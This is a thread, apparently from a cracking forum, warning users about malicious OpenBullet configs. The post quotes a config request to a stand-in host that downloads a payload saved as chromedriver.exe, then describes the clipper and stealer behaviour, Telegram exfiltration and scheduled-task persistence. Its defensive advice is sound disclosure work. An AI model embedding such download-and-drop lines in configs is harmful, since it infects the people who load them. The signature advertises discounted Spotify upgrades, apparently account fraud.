Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 197854

Beware of malicious/infected configs

by Denmark - 27 August, 2021 - 11:57 AM
This post is by a banned member (Denmark) - Unhide
Denmark  
Coder
1.161
Posts
49
Threads
5 Years of service
#1
We have noticed an increased volume of malicious OpenBullet configs lately.
Like many other malware-related incidents, the attacker uses compromised accounts to spread and to reply to their threads.
Unlike other malware, a malicious config won't have any detection on VirusTotal because there is no code being executed; it's text.
In other words, VirusTotal isn't aware that your config will be loaded on OpenBullet, and it will be translated to a set of instructions.

The malware attack vector is a malicious GET request, and it looks like this:
Code:
REQUEST GET "https://site.com/config/API"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
-> FILE "bin/chromedriver.exe"

The GET request leads to the payload "API" being downloaded with no extension, in the folder "bin" and then renamed to "chromedriver.exe".
So far, we have seen this malware change the victim clipboarded Bitcoin address (clipper) and read numerous files containing system information (stealer).
The malware logs the victim IP address and sends the stolen data to a Telegram bot. Persistence is granted through a task on the Windows Task Scheduler.

At any time, the malware may change depending on the attacker needs. Here are a few steps you can take to step up your security:

(1) Enable Two Factor Authentication. It will prevent your account from being accessed if your logins have been stolen.
(2) Do not access Cracked on a virtual machine, or a remote desktop, where you usually run potentially malicious files.
(3) Read your config with any text editor to check for any malicious requests, like malware (GET requests) or hitloggers (POST requests).

Last but not least, report malicious configs.
This leak has been rated as working 1 times this month. (8 times in total)
Selling Spotify upgrades at discount --> https://upgrade.sx/payment.php

I WILL IGNORE YOU IF YOU PM ME WITH UNDESCRIPTIVE SUBJECTS LIKE "hello"
[ Always confirm via PM before dealing with me. ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Staff || Anti-Leeching || Upgrade || Forum Rules || Achievements
This post is by a banned member (Sango) - Unhide
Sango  
Heaven
4.619
Posts
1.078
Threads
5 Years of service
#2
pugger
This post is by a banned member (MeSvAk) - Unhide
MeSvAk  
Registered
4.014
Posts
3.395
Threads
6 Years of service
#3
PepeBlushPepeBlushPepeBlushPepeBlushPepeBlushPepeBlushPepeBlushPepeBlushPepeBlushPepeBlushPepeBlush
This post is by a banned member (Scream) - Unhide
Scream  
Godlike
1.338
Posts
166
Threads
5 Years of service
#4
good information to know
This post is by a banned member (salmanbehroz) - Unhide
This post is by a banned member (antilame) - Unhide
antilame  
Registered
9
Posts
2
Threads
2 Years of service
#6
appreciate the heads up
This post is by a banned member (so9rat14) - Unhide
so9rat14  
Registered
8
Posts
0
Threads
2 Years of service
#7
(This post was last modified: 13 February, 2022 - 08:20 PM by so9rat14.)
gzzqgqsgfdsqg

gzzqgqsgfdsqgeg
This post is by a banned member (Sofia60222) - Unhide
12
Posts
0
Threads
2 Years of service
#8
Thanks for sharing

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: